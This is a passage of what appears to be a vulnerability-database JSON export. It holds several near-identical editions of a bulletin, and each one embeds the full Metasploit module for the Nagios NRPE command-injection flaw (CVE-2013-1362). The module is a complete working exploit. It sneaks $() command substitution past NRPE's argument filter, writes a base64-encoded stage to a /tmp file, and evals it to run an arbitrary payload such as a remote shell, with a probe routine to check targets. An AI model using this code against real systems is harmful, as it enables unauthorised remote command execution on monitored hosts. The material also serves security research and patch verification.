sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-06T14:12:56", "differentElements": ["modified", "published"], "edition": 62}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-06T16:11:08", "history": [], "viewCount": 95, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-06T16:11:08", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-06T16:11:08", "differentElements": ["modified", "published"], "edition": 63}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-15T10:23:48", "history": [], "viewCount": 95, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-15T10:23:48", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-15T10:23:48", "differentElements": ["modified", "published"], "edition": 64}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-15T12:22:48", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-15T12:22:48", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-15T12:22:48", "differentElements": ["modified", "published"], "edition": 65}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-17T20:29:16", "history": [], "viewCount": 96, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-17T20:29:16", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "metasploitReliability": "Excellent", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i 